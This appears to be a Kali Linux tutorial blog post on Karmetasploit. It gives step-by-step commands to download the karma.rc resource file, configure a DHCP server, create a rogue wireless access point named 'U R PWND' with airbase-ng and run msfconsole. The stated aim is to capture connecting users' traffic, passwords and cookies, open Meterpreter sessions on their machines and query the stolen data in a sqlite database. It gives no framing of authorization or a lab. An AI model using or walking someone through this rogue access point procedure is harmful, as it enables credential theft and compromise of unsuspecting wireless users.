Karmetasploit is a program used to create access points, capture passwords, collect information and perform web browser attacks. You create a fake modem or Access Point. A number of users connect to this point. You can listen to the traffic thanks to Karmetasploit.
Installing and Configuring the Karmetasploit Program
We will see Karmetasploit ready to use in Kali Linux. Our first step is to start with the download of the control file.
┌──(omer㉿kali)-[~] └─$ sudo wget https://www.offensive-security.com/wp-content/uploads/2015/04/karma.rc_.txt --2015-04-03 16:17:27-- https://www.offensive-security.com/downloads/karma.rc
data:image/s3,"s3://crabby-images/b1851/b18515f46d09e3013533fc17657ffc646e63cb98" alt="Installing the Karmetasploit Program"
“Isc-dhcp-server” installation
When users connect to the Access Point we will create, an IP address is expected to be assigned to the connected user. In this case, we will set the Kali Linux operating system as DHCP Server. Now we install isc-dhcp-server in Kali Linux.
┌──(omer㉿kali)-[~] └─$ sudo apt -y install isc-dhcp-server
data:image/s3,"s3://crabby-images/db4fc/db4fc3ab83b4725fc1015a77bf31e9f831cdd7da" alt=""Isc-dhcp-server" installation"
After the installation is complete, we make the necessary settings in the dhcpd.conf file. After making a backup of the dhcpd.conf file, you can make it similar to the example below.
root@kali:~# cat /etc/dhcp/dhcpd.conf
data:image/s3,"s3://crabby-images/2b554/2b554b035754a79aa84f30960b12fe1edd8ea832" alt="dhcpd.conf"
Now we will set up a few requirements. First of all, we install the libsqlite3-dev Package.
┌──(omer㉿kali)-[~] └─$ sudo apt -y install libsqlite3-dev
data:image/s3,"s3://crabby-images/27ae9/27ae9ed24cf7a49e9dcbe3c7dd98f54d09c8bdd4" alt="libsqlite3-dev"
Then we install Ruby Modules with the “activerecord sqlite3” command.
┌──(omer㉿kali)-[~] └─$ sudo gem install activerecord sqlite3
data:image/s3,"s3://crabby-images/54170/541700e22105fc9c7d02012fcc302ab952a4ebb1" alt="activerecord sqlite3"
Now that we have done the setup, we are ready to use Karmetsploit. The operations we will do will be as follows, respectively.
- We will detect the wireless card.
- We will start the wireless card with monitor mode.
- We will start a new Wireless network.
As the first step, We Detect the Wireless Interface Name with the “airmon-ng” command.
root@kali:~# airmon-ng start wlan0
data:image/s3,"s3://crabby-images/246b1/246b17cd41a8c74a22fb48235b6c5b80623a49e4" alt="airmon-ng"
As a second step, we will start the wireless card in monitor mode with the command “airbase-ng -P -C 30 -e” U R PWND “-v wlan0mon“. As seen in the following output, a new wireless interface named at0 has been started.
root@kali:~# airbase-ng -P -C 30 -e "U R PWND" -v wlan0mon
data:image/s3,"s3://crabby-images/97d6b/97d6b3cdcc10d481e2250067d7bada15d35910ed" alt="wireless card with monitor mode"
Now, we will add our own computer to this network.
ifconfig at0 up 10.0.0.1 netmask 255.255.255.0
data:image/s3,"s3://crabby-images/08a80/08a804afd396f48db07879b351df1f73f38d54e4" alt="ifconfig at0 up 10.0.0.1 netmask 255.255.255.0"
We are about to start the DHCP Server. We will need a database where the information collected when the server starts will be recorded. For this, we will first create a database and start the DHCP server.
root@kali:~# touch /var/lib/dhcp/dhcpd.leases root@kali:~# dhcpd -cf /etc/dhcp/dhcpd.conf at0 root@kali:~# ps aux | grep [d]hcpd
data:image/s3,"s3://crabby-images/7acd5/7acd5945833ae40a412345b6b78401aca18ac1d8" alt="DHCP Server"
We will start the msfconsole program as an external source, by pointing to the “karma.rc_.txt” file we downloaded at first. Now we are listening through the Acces Point we have created. A user connects to this point with a wireless connection and when he starts to operate on the web, all traffic is recorded in our database.
root@kali:~# msfconsole -q -r karma.rc_.txt
data:image/s3,"s3://crabby-images/d9709/d9709f3fffe200a2fdf3d127c527e67af8d72d26" alt="karma.rc_.txt"
Now we are looking at the registered packages.
data:image/s3,"s3://crabby-images/58854/58854e0edee87847e7f20051b326d86e1c561ccb" alt="Records recorded in our database"
data:image/s3,"s3://crabby-images/101ce/101cefc5742392cf270046becc75c9cc83e4eb14" alt="Records recorded in our database"
data:image/s3,"s3://crabby-images/620f3/620f31a1855fb6dba91dc1a8c2779e1e080119e7" alt="Records recorded in our database"
From the outputs above, we can see that the user connects to many addresses and performs operations. We will examine these outputs piece by piece.
data:image/s3,"s3://crabby-images/36034/36034481d1185200b41ba15634e07abf688f40d7" alt="Addresses the user is connected"
In the output below, the DNS lookup process is performed for the addresses that the user wants to connect to. In this section, it is seen that the user’s password information and cookie information are collected. After these processes, it is attempted to log on to the target computer.
data:image/s3,"s3://crabby-images/6d20c/6d20c975eb6e6356a220faa9132d2931af56b24c" alt="DNS lookup process"
data:image/s3,"s3://crabby-images/21ab8/21ab8601f18cfcb66cf90443f11daa2a862790e5" alt="DNS lookup process"
We look at what can be done in the Meterpreter session that opens. As we can see, we have seen what can be done in the session opened as an example. In addition, as information gathering continues, an incredible amount of information will be recorded. You may feel the need to check the database for their use. We are now interacting with the database.
data:image/s3,"s3://crabby-images/6cbe0/6cbe07469dd488b5438d7022d945bb78c3616063" alt="Meterpreter session"
data:image/s3,"s3://crabby-images/418f3/418f31fc2cda73e1d628ccc2ca988db0f59dd2c4" alt="Meterpreter session"
The database was created in the Home folder. We will connect to the database with the following command.
root@kali:~# sqlite3 karma.db
data:image/s3,"s3://crabby-images/8a707/8a7074658101b9286dc26f4d9b363b9555c7da31" alt="sqlite3 karma.db"
data:image/s3,"s3://crabby-images/7b57a/7b57aff5a1412d8a81c0fe7dedd592b0d72371f5" alt="sqlite3 karma.db"
We can check the information by using the database scheme. After that, your database is up to your information and the reporting of the recorded information.
sqlite> select * from hosts;
data:image/s3,"s3://crabby-images/33301/33301251e0d36c497d0331b4e56bbfe69bff7cfc" alt="database scheme"